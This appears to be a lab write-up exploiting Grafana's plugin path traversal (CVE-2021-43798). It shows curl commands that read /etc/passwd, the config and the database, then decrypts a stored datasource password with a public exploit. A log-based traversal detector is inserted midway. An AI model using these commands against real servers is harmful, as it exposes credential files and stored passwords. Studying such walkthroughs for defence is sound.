Reading the Files

The exploit from searchsploit was not returning the results.

curl --path-as-is http://192.168.156.181:3000/public/plugins/alertlist/../../../../../../../../etc/passwd

Reading Grafana config

curl --path-as-is http://192.168.156.181:3000/public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini

Reading database file

curl --path-as-is -s http://192.168.156.181:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
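
Detection side of the three requests above, as an added example that is not part of the original write-up: it flags access-log requests under /public/plugins/<id>/ whose ".." segments climb out of the plugin directory. The log lines are constructed, and the combined log format (for example from a reverse proxy in front of Grafana) and all function names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format), not taken from the page.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Dec/2021:10:00:01 +0000] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 1432
203.0.113.5 - - [07/Dec/2021:10:00:09 +0000] "GET /public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db HTTP/1.1" 200 593920
198.51.100.7 - - [07/Dec/2021:10:01:30 +0000] "GET /public/plugins/alertlist/img/icn-alertlist.svg HTTP/1.1" 200 2210
198.51.100.7 - - [07/Dec/2021:10:01:31 +0000] "GET /public/plugins/alertlist/img/../module.js HTTP/1.1" 200 8112
198.51.100.8 - - [07/Dec/2021:10:02:00 +0000] "GET /api/health HTTP/1.1" 200 70
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3})')
PLUGIN_PREFIX = "/public/plugins/"

def escapes_plugin_dir(raw_path):
    """True if a /public/plugins/<id>/... path climbs above the plugin directory."""
    # Drop the query string, then decode twice so single- and double-encoded
    # dots are compared as "..", and treat backslashes as separators.
    path = unquote(unquote(raw_path.split("?", 1)[0])).replace("\\", "/")
    if not path.startswith(PLUGIN_PREFIX):
        return False
    plugin_id, *segments = path[len(PLUGIN_PREFIX):].split("/")
    if plugin_id == "..":
        return True
    depth = 0  # directory depth relative to the plugin directory
    for seg in segments:
        if seg in ("", "."):
            continue
        depth += -1 if seg == ".." else 1
        if depth < 0:  # stepped above /public/plugins/<id>/
            return True
    return False

def find_traversal(log_text):
    """Return (client, raw path, status) for each request that escapes its plugin directory."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and escapes_plugin_dir(m.group(2)):
            hits.append((m.group(1), m.group(2), int(m.group(3))))
    return hits

if __name__ == "__main__":
    for client, path, status in find_traversal(SAMPLE_LOG):
        print(f"{client} status={status} {path}")
```

A 200 status on a flagged line means the file was served, so any secrets in it should be treated as exposed.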

Find the basic auth password in the database

anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w==

Find secret key in the .ini file.

# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm

Downloading the exploit to decrypt the key

git clone https://github.com/jas502n/Grafana-CVE-2021-43798.git

Set the secret key and auth key in AESDecrypt.go.

Exploit

go mod init example/hello
go mod tidy
go run AESDecrypt.go
[*] grafanaIni_secretKey= SW2YcwTIb9zpOOhoPsMm
[*] DataSourcePassword= anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w==
[*] plainText= SuperSecureP@ssw0rd
 
 
[*] grafanaIni_secretKey= SW2YcwTIb9zpOOhoPsMm
[*] PlainText= jas502n
[*] EncodePassword= THBXSVgzN3fsXdpUlrVpAKbgMOEb0ABTVZ4B/fGWwA==